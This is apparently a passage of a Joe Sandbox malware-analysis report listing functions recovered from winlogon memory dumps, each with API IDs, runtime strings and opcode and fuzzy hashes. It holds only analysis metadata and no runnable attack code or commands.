                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: c300b2b6b54622bad3c43c23df103e30e38a6bb1438ec9a2dd89e032c6842fde
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 53518932729683CAEB54CB15E848B9DB7A6FB44B88F508536DE4B47788DF39C841CB00
                                                                                Function 000001E858981A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d0bcd0cf9b4692289a878d77c8ac4738952449dce6fe18ad4e1a7071ab5e44cd
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: D4F03C723246C1D2EB609B61F9C479DB761FB88BC8F844032DE4D46954DE2CC68DCB00
                                                                                Function 000001E85898BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: e6b40846573bec2309256a1e3779184d66e370f070609bbf47c065b346f7c57b
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: A2F06271221685D1FB108F29E84539DB321EF857A1F54062ADE6E452E4CF2CC045C700
                                                                                Function 000001E858983044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 177804a8e33fc8a1ffb9e6d06ac6c2892e3a9ed2a31dc03627c06d5a34e3f628
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: A4F0F874624BC5D2EA148F53F9551ADB662AF48FD0F489132EE4E47B18DE2CC4858700
                                                                                Function 000001E858985710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction ID: ff1100847cf1c0e0aadc7ec0e970ba072bd13cc79387902f55229e6ec2abdf55
                                                                                • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction Fuzzy Hash: 0361C436629A85CAE760DB55E45039EB7A0FB88784F504127EE8E87BA8DF7CC444CF00
                                                                                Function 000001E858994104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 63986d8d169832ca2b3c9ff94d929ac1109ad7e490c18855dc707efbf0d460dd
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 5D11A3B2B30AD092F67A5569D4653EDB1477F783B8F090636AD7E077D6EE24C8414201
                                                                                Function 000001E8589C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: b4ee51cf0a1e5aea1822e43a26c047e5dcf7f4fbb0b99cff55914cd4d144b702
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 7511E932AB0ED1D2FAA42528E4523EDBF806F59374F49873BAD7E067D6CE26C8417101
                                                                                Function 000001E858963504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 13a26281ade054cd1280fdbce72e43605aafa02c3cf2d887f28f1c2fac503938
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: D511A332A30AD191FA64192AE4413EDB1906F59374FD8873BBD6E076E6CE38C8417100
                                                                                Function 000001E8589BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 45fbb07566537809df07c08353ba596d2c45bc6c88eb3f332a9267d3a220cd63
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: A661C6766286C0CEFA658BA9E5443EEFAA0EF85746F508837CE0E177A5DF34C8458300
                                                                                Function 000001E85895F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: bbb57aa9e3b830d463c4fe85b52b4203214c9bc4de7028ccc68d76f93c744b6c
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 2761A2766206C0C2FA659B65E5443EEFAA1EF867A6F544837CE0E17BA4DF34C8458300
                                                                                Function 000001E85898AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: bb76fc1650d308761c410147ea84cb38f2e16afbcf0730215f2385a251eb584a
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 6C614633610A85CAEB209F65D4803DDB7A1FB48B88F044226EE4E17B99DF78C595CB02
                                                                                Function 000001E85898AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 49808e8ca0374573422c17999fa92c520f6827b0ca759f7661e9c90c8d8cbcb6
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: C85138732206C2CBEB648B25D58439DB7E0EB54B99F184126DE9D87A96CF38D491CF02
                                                                                Function 000001E8589BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: b8cb1cdd645de17ac90d150e5576baa1f770b257ea5295feeb99f43c7e10e3bf
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: A9517A322292C0CEEB648B65D45439CB7E0FB55B96F188227DE9D87B95CF39D490C702
                                                                                Function 000001E85895A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 0ad0f10a0311de8fe70e4511306a68505f179f6318197c4e8bd1820910d7e08b
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: DF517E322242C1CAEB648B25E44439DB7E0FF55B9AF184127DE9D87B95CF38D491CB0A
                                                                                Function 000001E8589B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 5afbde93f76065e937d33a33ecda40d7cc0652e0afb463397a4e63f594b95558
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: B751B932629280CEEB55CF15E445BDCB799FB48BD9F508076DE0A63788EFB4D8418704
                                                                                Function 000001E858958405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: bfd78980145a28763c880af9517e8ac90edd43b032dea0cdb72a4fbda65ea15a
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 4A51AC32621680CAEB14CF15E445BDEB799FF54B9AF508176DE4E63788EF34D8428B04
                                                                                Function 000001E8589B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: a63bd806f66d012ce775473c1f40d5f64a693a31238674c758956550f9c12806
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: F0318832225680DAEB159F11E849BDDBBA9FB48BD9F458036AE5E13788DF38C940C704
                                                                                Function 000001E8589583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 56d3e007963a7e7881fb8535ced7d73073085fdb1eb8715deed5cad551f2bc8b
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: AD317C32221680D6EB14DF12E8457DEB7A4FF40B9AF958026EE5E17784DF38D941C704
                                                                                Function 000001E858992058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 5158255b9f45075a47059d5597f2be23213eaa00bc29a0f5feecf0f9424b8990
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 6BD1AE32B24AC0C9E711CFA9D4402ECBBB6FB54B98F144226DE6E97B99DE34C516C740
                                                                                Function 000001E8589814A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 87d0c39c7ef690860e2d692a8e2b1ea7438f5f62204bc229bf9756ed41ae7668
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: FA014832620AD0C6E715EFA6E90418EB7A2FB88FC1F044436EE4E43729EE38C051C740
                                                                                Function 000001E858992980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: 12399152d6f5684d12032a5c33f3ea79e7a8066ea1a4d7d76d6e965cdc9918e8
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: DD91AD327206D0C5F7609FA9D8803EDFBA6BB45B98F14412BDE2E67A95DE34C486C700
                                                                                Function 000001E85898253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: dc5de42c1dc400c54a34142e8686c4d9b9fee3a7d214c8df3c00669743a542fc
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 357190362207C2CAE7259EA6E8443EEF795FB89B84F440037DD0E53B89DE35D6458B00
                                                                                Function 000001E8589B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 479c25fd653139756ea47a74aec904b6b413ad4f2ed2086552f17bedce541712
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: EC614632A29B84CAEB20DF65D4403DDB7A0FB49B99F144226EE4D17B98EF38D595C700
                                                                                Function 000001E858959E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 094ec712c1b288e37f31cb4837e425075fcca7128a69f700356e5ae3858f6197
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: A1612632A25B84CAEB20DF65E4403DDB7A0FB45B89F144226EE4D17B99DF38D595CB00
                                                                                Function 000001E858982330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 414b1109d79ba0e870cecf76c2af5f31b5d4bde43533dd6e83f510ec87595dfc
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 6951BD322287C2C1F664DAAAE4983EEF791FB95780F450137DE5E03B99DE39C9048B50
                                                                                Function 000001E8589926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: dcdd8cd598e05c42887886c746ddf0c279423bf44c0c1bf9e557dc900a05699c
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 2A416072625A80C6EB209F65E4443EDF7A2FB98794F514032EE4E87794EF38C441C740
                                                                                Function 000001E8589894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: 449c3b8d4a9707330a2244a19cbde2a29dd6a88ab94e040f38e9f4c0bfe6f638
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 5F110A36224B8182EB618F25F44439DB7E5FB88B94F584226EE8D47B69DF3CC551CB00
                                                                                Function 000001E8589B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 0e26cef9ba68d931c57e211af9cd086a3cc8b9350f618ba4ce6d2e1c4988f689
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 2AE08671650B84D4DF018F21E8802DC73A4EF58B64B8891339D5C06311FE38D1E9C300
